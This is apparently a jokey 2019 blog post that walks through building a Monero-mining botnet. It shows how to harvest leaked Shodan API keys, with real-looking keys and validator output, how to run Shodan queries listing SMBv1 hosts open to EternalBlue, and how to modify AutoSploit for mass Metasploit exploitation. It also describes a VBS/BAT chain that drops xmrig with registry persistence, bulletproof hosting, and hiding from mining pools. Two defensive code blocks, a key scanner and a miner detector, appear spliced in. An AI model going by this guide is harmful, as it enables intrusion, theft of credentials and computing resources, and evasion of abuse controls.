That XMR is MINE!

Accurate portrayal of me mining XMR

Who doesn’t want to be rich? Imagine being able to buy all of the My Little Pony Ultimate Equestria Collections in the world?

My Little Pony Ultimate Equestria Collection

Now that’s the dream! Well, a couple of months ago I took it upon myself to find a clever way to become the next big millionaire. Currently, my only source of income is bug bounties. Becoming a millionaire through HackerOne and BugCrowd would take quite some time, and I wanted every single My Little Pony Ultimate Equestria Collection NOW! It’s very rare that someone becomes a millionaire overnight, but it is possible and has happened (Just kidding, I have no idea what I’m talking about, I haven’t even Googled it yet).

In fact, here are some real-world examples

Every single one of those human beings worked hard for their money, or obtained it via chance/luck. That’s just capitalism, but what if there’s another method to becoming a millionaire overnight? Something that requires no effort (Okay, maybe a little) whatsoever, and pays off well…

Stealing!!!

Me robbing Bill Gates

No, not that kind of stealing…

Me hacking Bill Gates

That’s right, hacking. The best form of theft (Just kidding, don’t steal), since there’s no physical aspect to it. Any advanced hacker can target some rich old white man and try to pwn his bank account, but that’s too risky in this day and age. Assuming our goal is to make 1 million dollars, that’d be too much money to pull off the operation without setting off any alarms. Not to mention the fact that stealing that amount of money would probably overwhelm me with pure guilt. What if we could steal something else? Not money, but resources.

Photo of my Super Computer

If it isn’t clear to you yet, I’m referring to crypto-currency mining. Usually you’d mine on your own machine and get rewarded for your computations, but that reward is usually close to nothing depending on your mining rig. Bitcoin is mined primarily with GPUs, which are very expensive and power intensive. So, if you want to make more than a buck in this field, you’re gonna need some serious horsepower. Not many computers have powerful GPUs, and some have no GPU at all, but every single computer has a CPU, powerful or not. So if we wanted to target machines en masse, mining on a CPU would be our best bet. For this, we’ll use the crypto-currency known as Monero (XMR).

Monero (XMR) is an open-source cryptocurrency created in April 2014 that focuses on fungibility, privacy and decentralization. Monero uses an obfuscated public ledger, meaning anybody can broadcast or send transactions, but no outside observer can tell the source, amount or destination. Monero uses a Proof of Work mechanism to issue new coins and incentivize miners to secure the network and validate transactions.

It’s completely anonymous, compared to BTC which is pseudonymous.

You’re telling me I can mine this crypto-currency on essentially ANY computer and stay anonymous at the same time? Sounds like the perfect coin for botnet mining.

We know what coin to use for our super evil botnet, but where do we find machines we can infect? This is the tricky part. There are tons of vulnerable devices out there; in fact I believe everything is hackable if it’s connected to the internet, given enough time and dedication. We can use several tools for this and find devices vulnerable to popular CVEs. The ideal exploit should align with the following for maximum efficiency of the botnet:

  • Easy to automate
  • Quick
  • Targets semi-powerful machines
  • Big attack surface

After some research I came across this article: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators

Someone had won the race to a million dollars via an XMR Botnet…

Me when I'm angry

This was disappointing at first, but it got me thinking about two things:

  1. This was already really popular, which increases the chances of getting caught.
  2. Anyone can replicate successful botnets, with minimal effort.

The CVE these hackers were using was CVE-2017-0144, aka EternalBlue. It seemed ideal for the operation, hence their significant earnings. Let’s try and replicate their botnet and make ourselves a million dollars, baby! (Hypothetically, of course…)

IM RICH BABYYY

Gathering our Targets

There are two methods we can use to gather our targets. Shodan or ZMap.

ZMap

Pros:

  • Absolutely Free

Cons:

  • Self Hosted
  • Requires High Speed Internet
  • Requires ZGrab for Headers
  • Manual Parsing Required
  • Scanning the internet from scratch
  • Re-inventing the wheel

Shodan

Pros:

  • Online Service
  • Provides an API for programming languages and a CLI tool
  • Search Filters
  • Real Time Data Streaming
  • Honey Pot Detection
  • DB of the entire internet, at the touch of your fingertips
  • Okay we get it, Shodan is better…

Cons:

  • Costs up to $900

Clearly Shodan is better, but it’s really pricey. We’ll need at least a million targets for our operation since not all of them will be vulnerable or online. If we look at Shodan’s website for the price of the Small Business plan:

Too expensive 4 me...

I’m not a millionaire yet, so I’ll pass on that offer, but I am a hacker. Finding a paid API key shouldn’t be that hard. People always leave their API keys in source code and upload them to the internet not expecting anyone to find it. I Googled “Shodan Python API Example”, clicked on a relatively popular one and then looked for the variable containing the API key:

import shodan

SHODAN_API_KEY = "insert your API key here"

api = shodan.Shodan(SHODAN_API_KEY)

Now we just Google that variable name with quotation marks and look for idiots who have pasted their API keys online:

Yay, a key

If we throw that into Shodan’s CLI tool and check how many queries they have left:

frinto@pwnie:~$ shodan init 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF
Successfully initialized
frinto@pwnie:~$ shodan info
Query credits available: 100
Scan credits available: 100

Crap, that’s nowhere near enough. After 5 minutes of manually checking keys with 0 query credits and invalid keys, I decided to make my method of finding keys more efficient. Regex Scraper allows you to scrape a site’s source code and show all matching strings for a given regex pattern. \b[a-zA-Z0-9]{32}\b is the regex pattern for a Shodan API key.

Yay, more keys

Bam, now I just tabbed through all of the pages for my Google search and copy-pasted the keys into one huge text file. A lot of them were duplicates and also false positives, so I decided to automate the checking process with a script. Fortunately for me, there was already a tool for this on GitHub.
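The flip side of this for a defender is to run the same pattern over your own source tree before it ever reaches GitHub. The following is an added example, not code from the post or from any tool it mentions: it applies the post’s 32-character regex to a constructed sample file, drops duplicates, and uses a mixed-case plus entropy heuristic (an assumption, not Shodan’s key spec) to cut the false positives the post complains about, such as 32-character hex digests.

```python
import math
import re
from collections import Counter

# Shodan API keys are 32 alphanumeric characters; this is the pattern the
# post uses. Note it also matches 32-char hex digests (MD5), a common
# false positive in source trees.
KEY_RE = re.compile(r"\b[a-zA-Z0-9]{32}\b")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random keys score higher than words or hex."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_key(token: str, min_entropy: float = 4.2) -> bool:
    """Heuristic (an assumption, not Shodan's spec): real keys mix upper case,
    lower case and digits and are high-entropy; hex digests and constant
    names are not."""
    has_upper = any(ch.isupper() for ch in token)
    has_lower = any(ch.islower() for ch in token)
    has_digit = any(ch.isdigit() for ch in token)
    return has_upper and has_lower and has_digit and shannon_entropy(token) >= min_entropy


def find_candidate_keys(text: str) -> dict:
    """Map each distinct suspicious token to the first line it appears on.
    Duplicates (the same key pasted twice) are reported once."""
    found = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in KEY_RE.finditer(line):
            tok = m.group(0)
            if looks_like_key(tok) and tok not in found:
                found[tok] = lineno
    return found


# Constructed sample source file: the key on line 3 is made up for this
# example and is not a real Shodan key; line 5 is the MD5 of an empty string.
SAMPLE_SOURCE = """import shodan

SHODAN_API_KEY = "Ab3dEf7hIjK9lMn0PqR2sTuV5wXyZ8aB"
api = shodan.Shodan(SHODAN_API_KEY)
EXPECTED_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
backup_key = "Ab3dEf7hIjK9lMn0PqR2sTuV5wXyZ8aB"  # same key pasted again
"""

if __name__ == "__main__":
    for key, line in find_candidate_keys(SAMPLE_SOURCE).items():
        print(f"line {line}: possible hard-coded API key {key[:4]}...{key[-4:]}")
```

Wire it into a pre-commit hook over staged files and a leaked key never becomes someone else’s 180,000 query credits.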

frinto@pwnie:~/documents/tools/shodan-api-checker$ python2 shodankeys.py keys-2-test.txt 
{+} Testing Key: 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF
{+} Key 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF appears to be valid, and bonus, paid!
{+} Testing Key: Ld4jdENSFPTWdboKv2wodf82RWjtPNLs
{-} Key Ld4jdENSFPTWdboKv2wodf82RWjtPNLs is invalid!
{+} Testing Key: SkVS0RAbiTQpzzEsahqnq2Hv6SwjUfs3
{-} Key SkVS0RAbiTQpzzEsahqnq2Hv6SwjUfs3 is invalid!
{+} Testing Key: cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM
{*} Key cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM appears to be valid! Not paid for though!
{+} Testing Key: q9uXeVpnUUoJ44huOovdbm6qAetKG8fR
{-} Key q9uXeVpnUUoJ44huOovdbm6qAetKG8fR is invalid!
{+} Testing Key: bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP
{-} Key bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP is invalid!
{+} Testing Key: q9uXeVpnUUoJ44huOovdbm6qAetKG8fR
{-} Key q9uXeVpnUUoJ44huOovdbm6qAetKG8fR is invalid!
{+} Testing Key: bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP
{-} Key bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP is invalid!
{+} Testing Key: wfGupwtAM1gvSaz2pgeb5fpheHdvAEtY
{-} Key wfGupwtAM1gvSaz2pgeb5fpheHdvAEtY is invalid!


{+} Acquired 2 valid keys
{+} Acquired 1 paid-keys
{+} Acquired 1 community-keys

{+} Paid Keys...
9xR76NYbEXhXFRwrXYdREGs18i1HvaqF

{+}Community Keys...
cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM

This is just an example with 2 API keys I found, but long story short I found a key with 180,000+ query credits!

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan info
Query credits available: 183932
Scan credits available: 65536

Shodan query credits are equal to 100 results per credit: 183932 * 100 = 18393200

Yay, AN EXPENSIVE KEY!

This key gives us access to 18,000,000+ IP addresses. Not that we needed that many, but it’s still a good find. Now onto counting our potential targets. We can use Shodan’s count feature for this.

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan count "vuln:CVE-2017-0144"
0

WTFFFF!!!

Shodan isn’t tagging devices vulnerable to CVE-2017-0144 because it’s not possible to tell whether a system is vulnerable from a header; that would require actually running an EternalBlue PoC against it. This means we’re going to have to manually narrow down machines that are potentially vulnerable to CVE-2017-0144:

frinto@pwnie:~$ shodan count 'port:445 "SMB Version: 1" os:Windows !product:Samba'
977080

Nearly a million devices are potentially vulnerable to EternalBlue, great. Now let’s download all of the IPs.

frinto@pwnie:~$ shodan download --limit 1000000 pwnable.json.gz 'port:445 "SMB Version: 1" os:Windows !product:Samba'

Once they’re all downloaded, which could take hours, we need to parse the GZip file and output only the respective IP addresses:

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan parse --fields ip_str pwnable.json.gz > ip-list.txt
frinto@pwnie:~/documents/tools/shodan-api-checker$ cat ip-list.txt 
104.206.17.81
212.227.248.250
185.25.20.45
138.201.16.68
23.94.226.133

We now have a text file of every single device on earth that could be potentially vulnerable to EternalBlue, it’s exploit time, or is it…?

Like a bossss

Bullet Proof Hosting

We’re going to need to host our distributor(s), right? This calls for some BPH (Bullet Proof Hosting).

Bulletproof hosting is a service provided by some domain hosting or web hosting firms that allows their customer considerable leniency in the kinds of material they may upload and distribute. This leniency has been taken advantage of by spammers and providers of online gambling or illegal pornography.

Basically, we can’t just use any hosting service for our operation. This requires something more discreet. We have three options here:

A. Hosting service that advertises itself explicitly as BPH, commonly found on Dark Web markets

B. Cheap Hosting services from Russia or third world countries that don’t fall under certain internet regulations

C. Hosting services like GCP, AWS, and Digital Ocean offer free trials that can be abused

Any of these works fine, but option C is risky since getting banned is a real possibility. Option A is the most costly since it’s explicit BPH. Then you have option B, which isn’t free, but it’s affordable and getting banned isn’t something to worry about. Once we’ve chosen our hosting provider, we can SSH into it, but remember…don’t ever use your actual IP. Throw those proxy chains on!

P.S. - In a real world scenario, it would be best to obtain multiple servers and have them all distribute the malware for your botnet equally. That way it’s significantly harder to identify the actual location of the attacker.

Exploitation

There are endless possibilities when it comes to spreading your XMR mining malware. To cut to the chase, the method I used was a tool named AutoSploit. It automates Metasploit for mass exploitation. Using this tool we can iterate over every IP address in our text file and run exploit/windows/smb/ms17_010_eternalblue against the target. I’m not going to explain the setup process of AutoSploit, since there’s already tons of documentation on it. Import your hosts file, add exploit/windows/smb/ms17_010_eternalblue as a custom exploit file, and then run AutoSploit. You’ll quickly realize that by default, AutoSploit only takes an LHOST and an LPORT as arguments for your workspace. This means we’ll have to edit the source code and make it set the payload to windows/exec instead of generic/shell_reverse_tcp. We can change this in the lib/exploitation/exploiter.py file:

                    # What's the point of having a workspace if you overwrite it every fucking time...
                    rc_script_template = (
                        "workspace -a {workspace}\n"
                        "use {module_name}\n"
                        "setg lhost {lhost}\n"
                        "setg lport {lport}\n"
                        "setg verbose true\n"
                        "setg threads 20\n"
                        "set rhost {rhost}\n"
                        "set rhosts {rhosts}\n"
                        "run -z\n"
                        "exit -y\n"
                    )

Remove the LHOST and LPORT lines from the rc_script_template variable and append setg payload windows/exec and setg CMD {malicious_payload_here}. Ideally, in a real-world scenario {malicious_payload_here} would fetch an attacker’s VBS script and execute it. This VBS script then downloads an XMR miner, like xmrig, and a BAT file which starts the miner with the attacker’s wallet address and mining pool as command line arguments. Keep in mind this is all done in the background as well. To make the miner persistent, the attacker adds the BAT file to the registry for execution at login. The BAT file would also check whether the system is 64- or 32-bit before fetching the matching xmrig binary.
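Every step in that chain leaves telemetry, which is what a blue team hunts for: a process started with a pool URL and a wallet on its command line, and a script dropped into a Run key. The following is an added example, not code from the post or from any tool it names: a small detector run over constructed Sysmon-style records (field names, thresholds and the placeholder wallet are assumptions, not a vendor schema), which flags the renamed miner on behaviour rather than on the xmrig file name.

```python
import re

# Indicators drawn from the behaviour described above: a miner launched with a
# pool URL and wallet on the command line, and a .bat registered in a Run key.
# Field names mimic Sysmon ProcessCreate / RegistryEvent records (assumption).
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://", re.IGNORECASE)
# Monero standard addresses: 95 base58 characters beginning with '4'.
XMR_ADDR_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
MINER_FLAGS = ("--donate-level", "--algo", "-o ", "-u ", "--coin")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(?:bat|cmd|vbs)\b", re.IGNORECASE)


def score_event(ev: dict) -> list:
    """Return the names of the indicators matched by one telemetry record."""
    reasons = []
    if ev.get("event") == "ProcessCreate":
        cmd = ev.get("cmdline", "")
        if STRATUM_RE.search(cmd):
            reasons.append("stratum pool url")
        if XMR_ADDR_RE.search(cmd):
            reasons.append("monero wallet on cmdline")
        if sum(flag in cmd for flag in MINER_FLAGS) >= 2:
            reasons.append("miner-style flags")
        if "xmrig" in ev.get("image", "").lower():
            reasons.append("xmrig image name")
    elif ev.get("event") == "RegistryValueSet":
        if RUN_KEY_RE.search(ev.get("target", "")) and SCRIPT_EXT_RE.search(ev.get("details", "")):
            reasons.append("script registered in Run key")
    return reasons


def find_miner_activity(events: list, min_indicators: int = 1) -> list:
    """Keep (id, reasons) for records with at least min_indicators hits."""
    return [(ev["id"], r) for ev in events if len(r := score_event(ev)) >= min_indicators]


# Constructed telemetry; the wallet is a placeholder, not a real address, and
# the miner binary has been renamed to show that name-based rules miss it.
FAKE_WALLET = "4" + "A" * 94
SAMPLE_EVENTS = [
    {"id": 1, "event": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"id": 2, "event": "ProcessCreate", "image": r"C:\Users\Public\svc64.exe",
     "cmdline": f"svc64.exe -o stratum+tcp://pool.example.invalid:3333 -u {FAKE_WALLET} -p x --donate-level 1"},
    {"id": 3, "event": "RegistryValueSet",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater",
     "details": r"C:\Users\Public\start.bat"},
]

if __name__ == "__main__":
    for event_id, reasons in find_miner_activity(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
```

Pair this with sustained CPU usage and outbound connections to unusual ports from the same host and you have the three signals the author’s "all done in the background" claim depends on nobody watching.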

BUTTTTTT

Hold up....

Luckily for us, this is all hypothetical and I don’t actually have to do all of this. For a PoC, we can simply have the command ping our machine and see if it receives a ton of ICMP requests. Clearly, if you’re targeting that many machines, you’re bound to get a ton of ICMP requests.

Anyways, back to our hypothetical talk….

Mining Pool Restrictions

You’re going to have to mine with a pool if you want to make anything profitable. I mean, any outcome is profitable in this scenario since it’s all free, but you know what I mean. We want to be millionaires! The thing is, most mining pools DON’T allow botnets. So, how do you hide your thousands of clients and avoid getting banned from the pool? We’ll use MineXMR as an example, since they have a strict botnet policy. The tool XMRig-Proxy allows you to tunnel your clients’ hashrate and make it appear as one single client to MineXMR. This eliminates any botnet accusations and keeps you safer from bans. Now you can watch as you dominate the number one spot on MineXMR!

Finally, we’re all done. We can sit back and relax.

Time to check our wallet…

frinto@pwnie:~$ xmr-wallet 
Current Balance: 98349839 XMR

YES!

Written on July 16, 2019